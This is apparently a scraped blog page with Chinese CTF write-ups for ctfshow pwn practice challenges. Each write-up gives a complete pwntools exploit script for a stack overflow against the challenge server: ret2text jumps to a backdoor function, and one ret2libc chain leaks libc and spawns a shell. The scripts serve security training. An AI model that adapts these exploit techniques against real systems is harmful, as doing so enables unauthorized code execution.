PWN-PRACTICE-CTFSHOW-2
PWN-PRACTICE-CTFSHOW-2
- pwn05
- pwn06
- pwn07
- 01栈溢出之ret2text
pwn05
栈溢出,覆盖返回地址为后门函数getFlag起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28091)
elf=ELF("./pwn1")getFlag=0x08048486
payload="a"*0x14+"bbbb"+p32(getFlag)
io.sendline(payload)io.interactive()
pwn06
栈溢出,覆盖返回地址为后门函数getFlag起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28011)
elf=ELF("./pwn1")getFlag=0x400577
ret=0x40044e
payload="a"*0xC+"b"*8+p64(ret)+p64(getFlag)
io.sendline(payload)io.interactive()
pwn07
栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28098)
elf=ELF("./pwn1")puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x40061F
pop_rdi=0x4006e3
ret=0x4004c6#gdb.attach(io,"b * 0x40061D")
#pause()payload="a"*0xc+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9apayload="a"*0xc+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)#pause()io.interactive()
01栈溢出之ret2text
栈溢出
覆盖返回地址为后门函数ctfshow起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28184)
elf=ELF("./pwn1")ctfshow=0x400637
ret=0x4004fe
payload="a"*0x80+"b"*8+p64(ret)+p64(ctfshow)
io.sendline(payload)io.interactive()
PWN-PRACTICE-CTFSHOW-2相关推荐
- CTFshow——Pwn(1)
CTFshow--Pwn(1) 有点懒不想写write up了.只有exploit. PWN签到题 from pwn import * p = remote('xxx',xxx) p.interact ...
- ctfshow pwn——PWN签到题、pwn02
PWN PWN签到题 pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwnd ...
- CTF比赛PWN题sgtlibc通用快速解题框架
CTF比赛PWN题sgtlibc通用快速解题框架 安装 开源地址:https://github.com/serfend/sgtlibc 使用 pip install sgtlibc -U 安装pwn解 ...
- CTFshow 击剑杯 部分WP
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...
- CTFSHOW 套娃shell
CTFSHOW 套娃shell 1.题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了): GET /?file=/a HTTP/1.1 Host: 127.0.0.1 ...
- [ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯
目录 [Misc]哇库哇库 [Misc]显卡坏了 赛后看官方wp给的脚本: [Web]easy_eval [Web]repairman [Crypto]easy_base [Crypto]天知地知(赛 ...
- ctfshow愚人节欢乐赛wp(部分)
目录 特殊base 凌晨四点的ctfshow php的简单RCE 以旧换新(签退-送分) 暴躁的zip Easy_game 这次月赛拿了个第十二,差一丢丢,只能说凌晨四点赚到了,下面这些是我比赛的时候 ...
- ctfshow吃瓜杯 八月群赛 WriteUp/WP
Web: shellme 题目问题,没什么说的,进去直接搜ctfshow就是flag 热身 签到题,做过web入门的都应该知道怎么绕,分开来看 比如第一个部分可以用小数绕过,第二部分没有字母,可以用8 ...
- Hitcon 2016 Pwn赛题学习
PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的.写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的C ...
- HDU1089-1096 A+B for Input-Output Practice 系列问题(输入输出格式练习)
HDU1089 A+B for Input-output Practice (1) 问题描述:每行输入一对整数a和b,每行对应输出a与b的和. Sample Input 1 5 10 20 Sampl ...
最新文章
- JDBC:使用连接池管理连接
- 线上飙升800%,load达到12的解决过程
- 重构alert,confirm
- java+jsp+sqlserver 2008+Tomcat实现一个简单的搜索引擎
- 模态对话框和全选反选
- 六、PHP框架Laravel学习笔记——响应设置和重定向
- MySQL修改,表结构大幅修改
- Jaakko isalo谈《愤怒的小鸟》创意来源
- html当前行突出显示,Pandas Dataframes to_html:突出显示表行
- 数据工作者必备工作技能:数据治理
- 触发器详解——(一)D触发器
- 数学分析教程(科大)——2.8笔记+习题
- Chives 集群收割机图文说明
- CorelDRAW2021标准版 序列号授权码
- 教师使用计算机的能力提升,计算机专业教师教学能力提升途径
- IT猎头之挖角与反挖角
- 如何在浏览器中打开jupyter notebook
- 分布式系统-共识协议
- opencv+directshow采集视频图像
- 最好的网络拓扑制作软件